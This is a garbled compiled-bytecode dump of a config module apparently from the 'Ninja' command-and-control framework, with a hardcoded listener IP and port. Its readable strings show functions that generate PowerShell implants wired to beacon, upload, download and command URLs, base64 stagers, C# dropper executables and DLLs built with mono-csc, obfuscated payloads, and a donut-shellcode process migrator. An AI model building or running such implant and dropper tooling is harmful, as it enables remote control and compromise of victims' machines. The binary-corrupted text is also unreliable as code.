oi *ddlZddlZddlZddlZddlmZddlmZddlTdZ da dZ e Z e Ze Zdae ZdZdad Zd ad ZgZd Zd ZdZdZdZdZejed de!dDd"a#dZ$dZ%dZ&dZ'dZ(dZ)dZ*dZ+dZ,dZ-dZ.dZ/d Z0d!Z1d"Z2d#Z3d$Z4ed%&Z5d'Z6d(Z7d)Z8d*Z9d+Z:d,Z;d-Zd0Z?d1Z@d2ZAd3ZBd4ZCdS)5N)Console) generate_key)*zBaldie-campaign8082z2.2z 192.168.5.106NinjamainagentTFz 30/03/20261cVg|]&}ttj'Srandomchoicestringascii_uppercase.0is /home/kali/Ninja/core/config.py r s(*d*d*dUV6==9O+P+P*d*d*d UTF-8z/namesz/methodsz/contextz/namez /operationz /xmethodsz /operationsz/jbosswsz/extwsdlz/atomz /publishingz/axisz/indexz/publishz /uddisoapz/svcez /inquiryapired)stylectdd}|}tr+|dtdt dt dtdtdtd td td td td ddt}n)|dtdt dt dtdtdtd td td td td ddt}tdd}|||t"d|S)Nzcore/agents/payload2.ps1r{ip}{port}z{beacon}z {register}z {download}z{upload}z{image}z{cmd}z{re}z{md}{HTTP}httpsz{DATE}http)utils/payloads/Powershell/raw_payload.ps1wza[green][+] Raw Payload written to:[/green] [cyan]utils/payloads/Powershell/raw_payload.ps1[/cyan])openreadSSLreplaceHOSTPORTbeacon register_url download_url upload_url image_url command_url result_url modules_urlKDATEwritecloseconsolelogfpps1payloads rPAYLOADr=8s_ (# . .B ''))C kkk&$''//$??GG TZ[[ccdpr~HHIUWcddllmwyCDDLLMVXabbjjkrs~GGHNPZ[[ccdjlwxx@@AIKRSS[[\dfkllkk&$''//$??GG TZ[[ccdpr~HHIUWcddllmwyCDDLLMVXabbjjkrs~GGHNPZ[[ccdjlwxx@@AIKQRRZZ[cejkk>DDG MM# MMOOO KKsttt Jrctdd}|}trb|dtdt dt dd}na|dtdt dt dd}td d }|||t d |S) Nzcore/agents/stager.ps1rrr z {b64payload}r!r"r#z+utils/payloads/Powershell/base64_stager.ps1r%zf[green][+] Stager Payload written to:[/green] [cyan]utils/payloads/Powershell/base64_stager.ps1[/cyan]) r&r'r(r)r*r+ b64_payloadr5r6r7r8r9s rSTAGERr@Hs & , ,B ''))C ~kk&$''//$??GGXcddllmuv}~~kk&$''//$??GGXcddllmuv|}}@#FFG MM# MMOOO KKxyyy Jrc tdd}tdd}|}tr|dt t dt t dt tdt d }n|dt t dt t dt tdt d }||| | d }d } tj |d t dnA#t$r4}tdt!|zYd}~nd}~wwxYw tj |d t ddS#t$r5}tdt!|zYd}~dSd}~wwxYw)Nz core/agents/simple_dropper.ninjarz(utils/payloads/Executables/cs_dropper.csr%rr z {b64_stager}z{http}zhttps://zhttp://zmono-csc -r:core/lib/System.Management.Automation.dll utils/payloads/Executables/cs_dropper.cs -out:utils/payloads/Executables/dropper_cs.exe -target:exe -warn:2zmono-csc -r:core/lib/System.Management.Automation.dll utils/payloads/Executables/cs_dropper.cs -out:utils/payloads/Executables/dropper_cs.dll -target:library -warn:2T)shellzd[green][+] C# Dropper DLL written to:[/green] [cyan]utils/payloads/Executables/dropper_cs.dll[/cyan]z([-] ERROR generating csharp payload : %szd[green][+] C# Dropper EXE written to:[/green] [cyan]utils/payloads/Executables/dropper_cs.exe[/cyan])r&r'r(r)csobfr*r+ b64_stagerr5r6 subprocess check_outputr7r8 Exceptionprintstr)r:fpocsexedlles r cspayloadrOXs{ 0# 6 6B 93 ? ?C B Z ZZd , , 4 4XuT{{ K K S STbchisctct u u } }GINOYIZIZ[[ ZZd , , 4 4XuT{{ K K S STbchisctct u u } }GINOXIYIYZZIIbMMMIIKKKHHJJJ nC rCK40000 z{{{{ KKK @3q66IJJJJJJJJKK40000 z{{{{{ KKK @3q66IJJJJJJJJJKs0)0G H$*HH0I J *JJ c tdd}|}tdd}|t|d|t ddS#t$r5}t dt|zYd}~dSd}~wwxYw)Nr$rbz)utils/payloads/Powershell/payload-obf.ps1r%rzh[green][+] Obfuscated payload written to:[/green] [cyan]utils/payloads/Powershell/payload-obf.ps1[/cyan]z,[-] ERROR generating obfuscated payload : %s) r&r'r5obfvardecoder6r7r8rGrHrI)fr<rNs r obfuscaterUrs O .s'AAA1v- . .AAArzModules/Migrator.ps1r%zQ[green][+] Migrator payload written to:[/green] [cyan]Modules/Migrator.ps1[/cyan])donutcreater&r'r)base64 b64encoderSjoinranger5r6r7r8) shellcoder:tempoutputs rmigratorres "MNNNI *C 0 0B 7799D << v'7 'B'B'I'I''R'R S S [ [\egigngnAAaAAAhChC D DD (# . .F LL LLNNN KKcdddddrcd}|D]$}|tt|dz z}%tjt |ddS)Nr -r)chrordr^r_ bytearrayrS)rIdrs rrCrCs] A ## SVVrM"" "  Ia11 2 2 9 9' B BBrc |adSN)r+)in_ports rset_portros DDDrc |adSrm)COUNT)in_counts r set_countrss EEErc |adSrmPOINTER) in_pointers r set_pointerrxs GGGrc |adSrm)r*)in_ips rset_ipr{s DDDrc6|t|z t|<dSrm)TIME)idin_times rset_timersb!DHHHrctSrmrur rr get_pointerrs Nrc"tadSrm)rAESKeyr rrset_keyrs ^^FFFr)Dr^rrEr\ rich.consolercore.Encryptionrcore.Obfuscate campaign_namer+VERSIONdictAGENTSCOMMANDr}rq WEBSHELLSWEBSHELL_COUNTr*BASErv Implant_TypePAYLOADSDonutr(CERTKEYr4r,r_rjr`rarSr raw_payload b52_payloadrD b52_stager hjf_payloadr? hjfs_payload sct_payload hta_payloadr-r.r/r0r1r2r3 follina_urlr7r=r@rOrUrWrerCrorsrxr{rrrr rrrs|  ((((((!     $&& tvv  $&&       v "''*d*dZ_Z_`bZcZc*d*d*d"e"egnooppwwyy                   '          KKK4OOO"+++ e e eCCC    """ r